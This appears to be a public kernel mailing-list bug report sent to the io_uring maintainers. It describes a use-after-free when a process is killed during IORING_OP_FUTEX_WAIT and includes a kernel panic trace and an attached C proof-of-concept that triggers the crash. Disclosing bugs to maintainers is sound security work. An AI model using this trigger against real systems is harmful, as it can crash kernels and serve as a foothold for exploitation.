From: rtm@csail.mit.edu
To: Jens Axboe <axboe@kernel.dk>,
Pavel Begunkov <asml.silence@gmail.com>,
io-uring@vger.kernel.org
Subject: use-after-free if killed while in IORING_OP_FUTEX_WAIT
Date: Wed, 04 Jun 2025 09:58:02 -0400 [thread overview]
Message-ID: <38053.1749045482@localhost> (raw)
[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]
If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the iouring request still exists. When (a little
later in do_exit()) the iouring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.
I've attached a demo:
# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---
Robert Morris
rtm@mit.edu
[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>
int dirfd = -1;
int pfds[2];
int sock = -1;
//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//
#define QUEUE_DEPTH 1
#define BLOCK_SZ 1024
struct app_io_sq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
unsigned *flags;
unsigned *array;
};
struct app_io_cq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
struct io_uring_cqe *cqes;
};
struct submitter {
int ring_fd;
struct app_io_sq_ring sq_ring;
struct io_uring_sqe *sqes;
struct app_io_cq_ring cq_ring;
};
struct file_info {
off_t file_sz;
struct iovec iovecs[]; /* Referred by readv/writev */
};
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return (int) syscall(__NR_io_uring_setup, entries, p);
}
int io_uring_enter(int ring_fd, unsigned int to_submit,
unsigned int min_complete, unsigned int flags)
{
return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
flags, NULL, 0);
}
int app_setup_uring(struct submitter *s) {
struct app_io_sq_ring *sring = &s->sq_ring;
struct app_io_cq_ring *cring = &s->cq_ring;
struct io_uring_params p;
void *sq_ptr, *cq_ptr;
memset(&p, 0, sizeof(p));
s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
if (s->ring_fd < 0) {
perror("io_uring_setup");
return 1;
}
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
if (p.features & IORING_FEAT_SINGLE_MMAP) {
if (cring_sz > sring_sz) {
sring_sz = cring_sz;
}
cring_sz = sring_sz;
}
sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQ_RING);
if (sq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
if (p.features & IORING_FEAT_SINGLE_MMAP) {
cq_ptr = sq_ptr;
} else {
cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_CQ_RING);
if (cq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
}
sring->head = sq_ptr + p.sq_off.head;
sring->tail = sq_ptr + p.sq_off.tail;
sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
sring->flags = sq_ptr + p.sq_off.flags;
sring->array = sq_ptr + p.sq_off.array;
s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQES);
if (s->sqes == MAP_FAILED) {
perror("mmap");
return 1;
}
cring->head = cq_ptr + p.cq_off.head;
cring->tail = cq_ptr + p.cq_off.tail;
cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
cring->cqes = cq_ptr + p.cq_off.cqes;
return 0;
}
int submit_to_sq(char *file_path, struct submitter *s) {
struct file_info *fi;
int file_fd = open(file_path, O_RDONLY);
if (file_fd < 0 ) {
perror("open");
return 1;
}
struct app_io_sq_ring *sring = &s->sq_ring;
unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;
off_t file_sz = 2;
off_t bytes_remaining = file_sz;
int blocks = (int) file_sz / BLOCK_SZ;
if (file_sz % BLOCK_SZ) blocks++;
fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
if (!fi) {
fprintf(stderr, "Unable to allocate memory\n");
return 1;
}
fi->file_sz = file_sz;
while (bytes_remaining) {
off_t bytes_to_read = bytes_remaining;
if (bytes_to_read > BLOCK_SZ)
bytes_to_read = BLOCK_SZ;
fi->iovecs[current_block].iov_len = bytes_to_read;
void *buf;
if( posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
perror("posix_memalign");
return 1;
}
fi->iovecs[current_block].iov_base = buf;
current_block++;
bytes_remaining -= bytes_to_read;
}
next_tail = tail = *sring->tail;
next_tail++;
index = tail & *s->sq_ring.ring_mask;
struct io_uring_sqe *sqe = &s->sqes[index];
sqe->flags = 0;
sqe->off = 0;
sring->array[index] = index;
tail = next_tail;
sqe->len = 0;
sqe->optval = 0x80000000;
static char buf[32];
memset(buf, 0xff, sizeof(buf));
*(long*)buf = 0xffffffff00000000;
sqe->addr = (__u64) buf;
sqe->opcode = IORING_OP_FUTEX_WAIT;
sqe->flags = 2;
sqe->fd = 130;
if(*sring->tail != tail) {
*sring->tail = tail;
}
int ret = io_uring_enter(s->ring_fd, 1,1,
IORING_ENTER_GETEVENTS);
if(ret < 0) {
perror("io_uring_enter");
return 1;
}
return 0;
}
int
main()
{
struct rlimit r;
r.rlim_cur = r.rlim_max = 0;
setrlimit(RLIMIT_CORE, &r);
unlink("z");
system("echo hi > z");
int pid = fork();
if(pid == 0){
struct submitter *s;
dirfd = open(".", 0);
socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
write(pfds[0], "a", 1);
write(pfds[1], "b", 1);
sock = socket(AF_INET, SOCK_DGRAM, 0);
s = malloc(sizeof(*s));
if (!s) {
perror("malloc");
exit(0);
}
memset(s, 0, sizeof(*s));
if(app_setup_uring(s)) {
fprintf(stderr, "Unable to setup uring!\n");
exit(0);
}
if(submit_to_sq("z", s)) {
fprintf(stderr, "Error reading file z\n");
exit(0);
}
printf("child exiting\n");
exit(0);
}
sleep(1);
printf("killing child\n");
kill(pid, 9);
usleep(200000);
}
next reply other threads:[~2025-06-04 14:10 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
2025-06-04 13:58 rtm [this message]
2025-06-04 14:12 ` use-after-free if killed while in IORING_OP_FUTEX_WAIT Jens Axboe
2025-06-04 16:22 ` Jens Axboe
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=38053.1749045482@localhost \
--to=rtm@csail.mit.edu \
--cc=asml.silence@gmail.com \
--cc=axboe@kernel.dk \
--cc=io-uring@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox